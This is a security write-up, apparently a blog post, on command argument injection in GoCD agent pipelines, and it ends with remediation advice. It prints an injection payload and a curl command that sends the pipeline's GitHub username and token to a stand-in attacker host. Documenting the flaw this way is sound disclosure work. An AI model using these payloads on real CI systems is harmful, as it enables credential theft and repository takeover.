GoCD Agent RCE leads to GitHub token leakage

What is GoCD?

GoCD is an open-source tool which is used in software development to help teams and organizations automate the continuous delivery of software. It supports automating the entire build-test-release process from code check-in to deployment.— Wikipedia

Remote Command Execution

Remote Command Execution (RCE) allows malicious actors to remotely execute system commands on the host machine where the affected application is hosted. With the ability to perform RCE, malicious actors can compromise the internal network leading to gain unauthorized access to the affected system and leak sensitive information.

Developers of CI/CD pipelines often make the mistake of sending user input (here, pipeline operators) to a command line that will execute in the background, allowing for Remote Code Execution through Command Argument Injection.

Command line Argument Injection

User input can be injected into a specified command line (known as “command line argument injection”) in a similar way that a SQL injection works. These parameters are often passed via environment variables to the command line, allowing developers and operators to design and configure the command line to do specific tasks based on their inputs.

RCE on GoCD Agent

RCE through argument injection is conceivable on GoCD agent; when attackers with adequate rights to run the pipeline and able to specify some environment variables which are utilized later as arguments within a command line.

To accomplish the attack, alter the environment variable that is supplied to a command line with the below payload to execute malicious instructions on the GoCD agent, which in our case, runs on Linux OS.

--insecure --argumentx; Linux Command;

Vulnerable environment variable to RCE

After that, execute the pipeline to execute the injected malicious command.

Steal GitHub access token with Argument Injection

Pipeline developers may not following security best practices for storing and retrieving secrets, such as GitHub access token used to to login to GitHub Server on the command line.

We found out that the pipeline’s developer is utilizing environment variables to save the GitHub account token and combine it to a “git” command line to execute it later on.

GIT_AUTHUSER: {{SECRET:[secrets][gitauthuser]}}
GIT_AUTHKEY: {{SECRET:[secrets][gitauthkey]}}

Using this information, an attacker can inject a malicious command and expose the GitHub access token.

--insecure --argumentx; curl -X POST -d “user=$GIT_AUTHUSER&key=$GIT_AUTHKEY” http://attackerhost/leaked;

The credentials will be delivered to attacker’s server inside normal POST request body as you can see from the below picture.

Leaked GitHub username and token

After that, we checked the GitHub token permissions, which allowed access to several private repositories (both read and write). When this is further exploited, the malicious actor gains control of the repositories storing both the infrastructure code and the application code, and can therefore delete and update the pipeline configuration, putting the entire infrastructure at risk by, for example, disabling the security checks.

Remediation

Make sure any static command arguments are automatically parsed from the YAML file rather than being used within the environment variables. Also, make sure the user-defined arguments are filtered before being sent to the command line if that’s the case.